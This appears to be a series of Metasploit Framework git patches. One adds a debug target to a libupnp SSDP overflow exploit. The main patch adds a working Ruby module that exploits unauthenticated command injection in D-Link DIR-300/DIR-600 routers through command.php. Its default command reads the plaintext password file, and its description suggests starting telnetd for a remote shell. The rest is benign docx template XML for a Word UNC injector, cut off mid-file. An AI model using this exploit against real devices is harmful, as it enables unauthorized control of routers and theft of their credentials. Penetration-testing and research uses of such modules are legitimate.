a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb index b473cb369160..da5e53993055 100644 --- a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb +++ b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb @@ -89,7 +89,15 @@ def initialize(info = {}) # Approximately 35,000 of these found in the wild via critical.io scans (2013-02-03) + } ], + + [ "Debug Target", { + + # The callback handles all target-specific settings + :callback => :target_debug + } ] + ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 29 2013')) @@ -214,6 +222,11 @@ def target_supermicro_ipmi_131 end + # Generate a buffer that provides a starting point for exploit development + def target_debug + buffer = Rex::Text.pattern_create(2000) + end + def stage_real_payload(cli) print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...") cli.put(payload.encoded + "\n") From 5ca0e4538802730c5674f58e329a0a7398f627b4 Mon Sep 17 00:00:00 2001 From: m-1-k-3 <github@s3cur1ty.de> Date: Mon, 4 Feb 2013 08:44:12 +0100 Subject: [PATCH 258/421] initial commit --- .../http/dlink_dir_300_600_exec_noauth.rb | 73 +++++++++++++++++++ 1 file changed, 73 insertions(+) create mode 100644 modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb diff --git a/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb new file mode 100644 index 000000000000..9b24a0fa80f7 --- /dev/null +++ b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb @@ -0,0 +1,73 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'D-Link DIR-600 rev B / DIR-300 rev B unauthenticated Remote Command Execution in command.php', + 'Description' => %q{ + Some D-Link Routers are vulnerable to OS Command injection. + You do not need credentials to the webinterface because the command.php + is accesseble without authentication. You could read the plaintext password + file. + Hint: To get a remote shell you could start the telnetd without any authentication. + }, + 'Author' => [ 'm-1-k-3' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'http://www.dlink.de/cs/Satellite?c=Product_C&childpagename=DLinkEurope-DE%2FDLTechProduct&cid=1197381489628&p=1197318958220&packedargs=QuickLinksParentID%3D1197318958220%26locale%3D1195806663795&pagename=DLinkEurope-DE%2FDLWrapper' ], + [ 'URL', 'http://www.s3cur1ty.de/home-network-horror-days' ], + [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-003' ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 04 2013')) + + register_options( + [ + Opt::RPORT(80), + OptString.new('CMD', [ true, 'The command to execute', 'cat /var/passwd']) + ], self.class) + end + + def run + uri = '/command.php' + + print_status("Sending remote command: " + datastore['CMD']) + + data_cmd = "cmd=#{datastore['CMD']}; echo end" + + begin + res = send_request_cgi( + { + 'uri' => uri, + 'method' => 'POST', + 'data' => data_cmd, + }) + return :abort if res.nil? + return :abort if (res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ HTTP\/1.1,\ DIR/) + return :abort if (res.code == 404) + + rescue ::Rex::ConnectionError + vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") + return :abort + end + + if res.body.include? "end" + print_status("Exploited successfully") + print_line("Command: #{datastore['CMD']}") + print_line("Output: #{res.body}") + else + print_status("Exploit failed.") + end + end +end From 24de0d2274129dcc6d9e2e1946e507329cbcd25a Mon Sep 17 00:00:00 2001 From: SphaZ <cyberphaz@gmail.com> Date: Mon, 4 Feb 2013 13:37:09 +0100 Subject: [PATCH 259/421] Data files moved. Updated to use Rex::zip and Msf::Exploit::FILEFORMAT --- data/exploits/docx/[Content_Types].xml | 2 + data/exploits/docx/_rels/.rels | 2 + data/exploits/docx/docProps/app.xml | 2 + .../docx/word/_rels/document.xml.rels | 2 + data/exploits/docx/word/document.xml | 2 + data/exploits/docx/word/fontTable.xml | 2 + data/exploits/docx/word/settings.xml | 2 + data/exploits/docx/word/styles.xml | 2 + data/exploits/docx/word/theme/theme1.xml | 2 + data/exploits/docx/word/webSettings.xml | 2 + modules/auxiliary/docx/word_unc_injector.rb | 273 ++++++++---------- 11 files changed, 143 insertions(+), 150 deletions(-) create mode 100644 data/exploits/docx/[Content_Types].xml create mode 100644 data/exploits/docx/_rels/.rels create mode 100644 data/exploits/docx/docProps/app.xml create mode 100644 data/exploits/docx/word/_rels/document.xml.rels create mode 100644 data/exploits/docx/word/document.xml create mode 100644 data/exploits/docx/word/fontTable.xml create mode 100644 data/exploits/docx/word/settings.xml create mode 100644 data/exploits/docx/word/styles.xml create mode 100644 data/exploits/docx/word/theme/theme1.xml create mode 100644 data/exploits/docx/word/webSettings.xml diff --git a/data/exploits/docx/[Content_Types].xml b/data/exploits/docx/[Content_Types].xml new file mode 100644 index 000000000000..39a9cb897f0e --- /dev/null +++ b/data/exploits/docx/[Content_Types].xml @@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/></Types> \ No newline at end of file diff --git a/data/exploits/docx/_rels/.rels b/data/exploits/docx/_rels/.rels new file mode 100644 index 000000000000..fdd8c4f37126 --- /dev/null +++ b/data/exploits/docx/_rels/.rels @@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships> \ No newline at end of file diff --git a/data/exploits/docx/docProps/app.xml b/data/exploits/docx/docProps/app.xml new file mode 100644 index 000000000000..1580fc2d1a14 --- /dev/null +++ b/data/exploits/docx/docProps/app.xml @@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>normal.dot</Template><TotalTime>0</TotalTime><Pages>1</Pages><Words>0</Words><Characters>3</Characters><Application>Microsoft Office Outlook</Application><DocSecurity>0</DocSecurity><Lines>0</Lines><Paragraphs>0</Paragraphs><ScaleCrop>false</ScaleCrop><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>0</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>12.0000</AppVersion></Properties> diff --git a/data/exploits/docx/word/_rels/document.xml.rels b/data/exploits/docx/word/_rels/document.xml.rels new file mode 100644 index 000000000000..0079d06931a7 --- /dev/null +++ b/data/exploits/docx/word/_rels/document.xml.rels @@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/></Relationships> \ No newline at end of file diff --git a/data/exploits/docx/word/document.xml b/data/exploits/docx/word/document.xml new file mode 100644 index 000000000000..81ef41e2f846 --- /dev/null +++ b/data/exploits/docx/word/document.xml @@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<w:document xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml"><w:body><w:p w:rsidR="00E97639" w:rsidRDefault="00E97639"><w:r><w:t> </w:t></w:r></w:p><w:sectPr w:rsidR="00E97639" w:rsidSect="00B25E88"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document> diff --git a/data/exploits/docx/word/fontTable.xml b/data/exploits/docx/word/fontTable.xml new file mode 100644 index 000000000000..20e9a398fef8 --- /dev/null +++ b/data/exploits/docx/word/fontTable.xml @@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<w:fonts xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="20002A87" w:usb1="80000000" w:usb2="00000008" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Cambria"><w:panose1 w:val="02040503050406030204"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000004B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/></w:font><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000207B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/></w:font></w:fonts> \ No newline at end of file diff --git a/data/exploits/docx/word/settings.xml b/data/exploits/docx/word/settings.xml new file mode 100644 index 000000000000..4692c237a851 --- /dev/null +++ b/data/exploits/docx/word/settings.xml @@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<w:settings xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main"><w:zoom w:percent="100"/><w:embedSystemFonts/><w:attachedTemplate r:id="rId1"/><w:defaultTabStop w:val="720"/><w:characterSpacingControl w:val="doNotCompress"/><w:doNotValidateAgainstSchema/><w:doNotDemarcateInvalidXml/><w:compat><w:useNormalStyleForList/><w:doNotUseIndentAsNumberingTabStop/><w:useAltKinsokuLineBreakRules/><w:allowSpaceOfSameStyleInTable/><w:doNotSuppressIndentation/><w:doNotAutofitConstrainedTables/><w:autofitToFirstFixedWidthCell/><w:underlineTabInNumList/><w:displayHangulFixedWidth/><w:splitPgBreakAndParaMark/><w:doNotVertAlignCellWithSp/><w:doNotBreakConstrainedForcedTable/><w:doNotVertAlignInTxbx/><w:useAnsiKerningPairs/><w:cachedColBalance/></w:compat><w:rsids><w:rsidRoot w:val="00B25E88"/><w:rsid w:val="00890656"/><w:rsid w:val="00B25E88"/><w:rsid w:val="00E97639"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="off"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:uiCompat97To2003/><w:themeFontLang w:val="en-US"/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/><w:doNotIncludeSubdocsInStats/><w:doNotAutoCompressPictures/><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/></w:settings> \ No newline at end of file diff --git a/data/exploits/docx/word/styles.xml b/data/exploits/docx/word/styles.xml new file mode 100644 index 000000000000..4a084626fc28 --- /dev/null +++ b/data/exploits/docx/word/styles.xml @@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<w:styles xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:docDefaults><w:rPrDefault><w:rPr><w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/><w:sz w:val="22"/><w:szCs w:val="22"/><w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/></w:rPr></w:rPrDefault><w:pPrDefault/></w:docDefaults><w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267"><w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="toc 1" w:uiPriority="39"/><w:lsdException w:name="toc 2" w:uiPriority="39"/><w:lsdException w:name="toc 3" w:uiPriority="39"/><w:lsdException w:name="toc 4" w:uiPriority="39"/><w:lsdException w:name="toc 5" w:uiPriority="39"/><w:lsdException w:name="toc 6" w:uiPriority="39"/><w:lsdException w:name="toc 7" w:uiPriority="39"/><w:lsdException w:name="toc 8" w:uiPriority="39"/><w:lsdException w:name="toc 9" w:uiPriority="39"/><w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/><w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/><w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Table Grid" w:semiHidden="0" w:uiPriority="59" w:unhideWhenUsed="0"/><w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/><w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Revision" w:unhideWhenUsed="0"/><w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Bibliography" w:uiPriority="37"/><w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/></w:latentStyles><w:style w:type="paragraph" w:default="1" w:styleId="Normal"><w:name w:val="Normal"/><w:qFormat/><w:rsid 